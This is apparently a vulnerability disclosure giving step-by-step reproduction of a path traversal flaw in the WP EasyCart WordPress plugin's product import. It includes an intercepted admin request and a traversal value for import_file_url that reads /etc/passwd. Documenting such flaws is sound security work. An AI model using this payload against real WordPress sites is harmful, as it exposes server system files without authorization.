1. Login as Admin.
2. Go to `wp-admin/admin.php?page=wp-easycart-products&subpage=products`
3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following:
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25
4. Change the value of `import_file_url` to a file (ex: `/../../../../../etc/passwd`)
5. Send the request and you will see that the contents of `/etc/passwd` is obtained

Note: only first line is obtained in the response.